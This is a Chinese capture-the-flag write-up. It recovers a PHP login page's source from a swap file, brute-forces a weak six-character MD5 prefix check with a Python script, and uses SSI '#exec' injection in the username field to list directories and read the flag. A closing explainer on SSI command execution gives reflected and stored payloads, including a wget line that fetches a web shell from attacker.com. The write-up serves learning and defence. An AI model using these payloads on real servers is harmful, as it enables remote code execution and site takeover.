深圳市住房和城乡建设厅网站昆山新意建设咨询有限公司网站

进入题目页面如下

尝试输入弱口令密码都显示错误

看题目是search，扫描一下根目录试试

/index.php.swp

得到源码

进行一下代码审计

<?php//开启输出缓冲，将所有的输出内容先保存到缓冲区，而不是直接输出到浏览器。ob_start();//定义一个名为 get_hash 的函数，用于生成一个随机的哈希值。function get_hash(){//定义一个包含各种字符的字符串，用于生成随机字符。$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';//从 $chars 中随机选取 5 个字符并拼接成一个字符串。$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//生成一个基于当前时间戳的唯一标识符，并与随机字符串拼接。$content = uniqid().$random;//对拼接后的字符串进行 SHA - 1 哈希处理，并返回哈希值。return sha1($content); }//设置 HTTP 响应的 Content - Type 头，指定响应内容为 HTML 格式，字符编码为 UTF - 8。header("Content-Type: text/html;charset=utf-8");//检查 POST 请求中是否包含 'username' 参数，并且该参数的值不为空。if(isset($_POST['username']) and $_POST['username'] != '' ){//定义一个管理员密码哈希前缀。$admin = '6d0bc1';//对用户输入的密码进行 MD5 哈希处理，并截取前 6 位，与管理员密码哈希前缀进行比较。if ( $admin == substr(md5($_POST['password']),0,6)) {//如果密码验证通过，弹出一个包含欢迎信息的 JavaScript 警告框。echo "<script>alert('[+] Welcome to manage system')</script>";//生成一个随机的文件名，文件名为 'public/' 加上 get_hash 函数生成的哈希值，后缀为 '.shtml'。$file_shtml = "public/".get_hash().".shtml";//以写入模式打开文件，如果无法打开则输出错误信息并终止脚本。$shtml = fopen($file_shtml, "w") or die("Unable to open file!");//定义要写入文件的文本内容，包含用户输入的用户名。$text = '******<h1>Hello,'.$_POST['username'].'</h1>******';//将文本内容写入文件。fwrite($shtml,$text);//关闭文件。fclose($shtml);//输出错误信息。echo "[!] Header  error ...";} else {//如果密码验证失败，弹出一个包含失败信息的 JavaScript 警告框。echo "<script>alert('[!] Failed')</script>";}} else {***}***
?>

代码仅对用户输入的密码进行 MD5 哈希处理

并截取前 6 位与预设的哈希前缀进行比较

可以通过简单的暴力破解或彩虹表攻击来找到满足条件的密码

由于只需要匹配 MD5 哈希的前 6 位，可以编写脚本，尝试不同的密码组合，计算其 MD5 哈希值并截取前 6 位进行比较，直到找到满足条件的密码

或使用预先计算好的 MD5 哈希值和对应的明文密码的彩虹表，查找哈希值前 6 位为 6d0bc1 的密码

python脚本

import hashlibadmin_prefix = '6d0bc1'
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()+-'# 简单的暴力破解函数，生成不同长度的密码组合
def brute_force():import itertoolsfor length in range(1, 10):for combination in itertools.product(charset, repeat=length):password = ''.join(combination)md5_hash = hashlib.md5(password.encode()).hexdigest()if md5_hash[:6] == admin_prefix:return passwordpassword = brute_force()
if password:print(f"找到密码: {password}")
else:print("未找到密码")

可以用pycharm运行python代码，结果如下

RhPd

使用密码登录并用burp suite抓包

得到路径

访问试试

得到这个界面

构造payload，返回上一个目录

username=<!--#exec cmd="ls ../"-->&password=RhPd

再次登录抓包，得到新的URL

访问试试

发现flag_990c66bf85a09c664f0b6741840499b2目录

payload

username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->&password=RhPd

再次登录抓包

访问，最后得到flag

SSI远程命令执行漏洞

Thinking

SSI（Server Side Includes）远程命令执行漏洞 是一种利用服务器配置不当，通过注入恶意SSI指令实现任意命令执行的高危漏洞

漏洞原理

SSI工作机制
SSI允许在HTML文件中嵌入服务器端指令（如 <!--#exec cmd="命令" -->），服务器解析时会执行这些指令。

漏洞成因

Web服务器（如Apache）开启 Includes 或 IncludesNOEXEC 配置
用户输入未过滤直接输出到SSI可执行文件中
允许上传扩展名为 .shtml 的文件

漏洞利用步骤

1. 检测SSI支持

nmap -p 80 --script http-ssi <目标IP> # 检测响应头包含 "Server: Apache/2.4.x (Unix) mod_include/2.4" 等 curl -I http://target.com/page.shtml # 查看是否返回 "X-SSI: enabled"

2. 命令注入方式

反射型注入
当用户输入被嵌入到SSI文件时

<!-- 原始代码 --> <html> <body>Welcome, <!--#echo var="QUERY_STRING" --></body> </html> # 攻击payload： http://target.com/page.shtml?name=<!--#exec cmd="id" -->

存储型注入
上传恶意 .shtml 文件

<!-- 关键注入点 --> <!--#exec cmd="wget http://attacker.com/shell.php -O /var/www/html/shell.php" -->